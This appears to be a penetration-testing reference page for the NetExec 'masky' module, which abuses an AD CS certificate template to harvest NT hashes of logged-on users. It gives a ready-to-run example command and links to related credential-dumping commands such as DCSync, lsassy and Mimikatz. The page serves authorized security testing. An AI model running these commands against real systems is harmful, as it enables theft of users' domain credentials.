NetExec masky Module
Remotely abuse a vulnerable certificate template (typically User) to enroll certificates as every interactively-logged-on user on the target host, then convert each cert to its NT hash. Requires local admin and a valid AD CS template.
- Tool
- nxc
- Category
- Credential Attacks / Hash Dumping
- Platform
- linux
- Requires
- password
- Protocols
- SMB
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
nxc smb <target> -u '<user>' -p '<password>' -M masky -o CA='<ca-fqdn>\\<ca-name>'
Examples
nxc smb 10.10.10.10 -u administrator -p 'Password123!' -M masky -o CA='ca.corp.local\\CORP-CA'
Tags
References
Related commands
- Impacket DPAPI Masterkey Decrypt DPAPI masterkey using user password to derive DPAPI encryption key
- Impacket Secrets Dump Dump hashes from remote Windows system (SAM, LSA, NTDS)
- Impacket Targeted DCSync (Single User) DCSync only one specific account instead of replicating the whole NTDS. Massively…
- Lsassy LSASS Dump Remotely dump LSASS credentials using lsassy
- Mimikatz Credential Dump Extract plaintext passwords and hashes from all available sources
- Mimikatz dpapi::masterkey Decrypt a DPAPI master key using the owner's plaintext password (or NT hash). Required…
- Mimikatz lsadump::dcsync Pull a single user's NT hash and Kerberos keys directly from a DC via the MS-DRSR…
- Mimikatz lsadump::sam Extract local SAM hashes (built-in Administrator, local users) from a live Windows host.…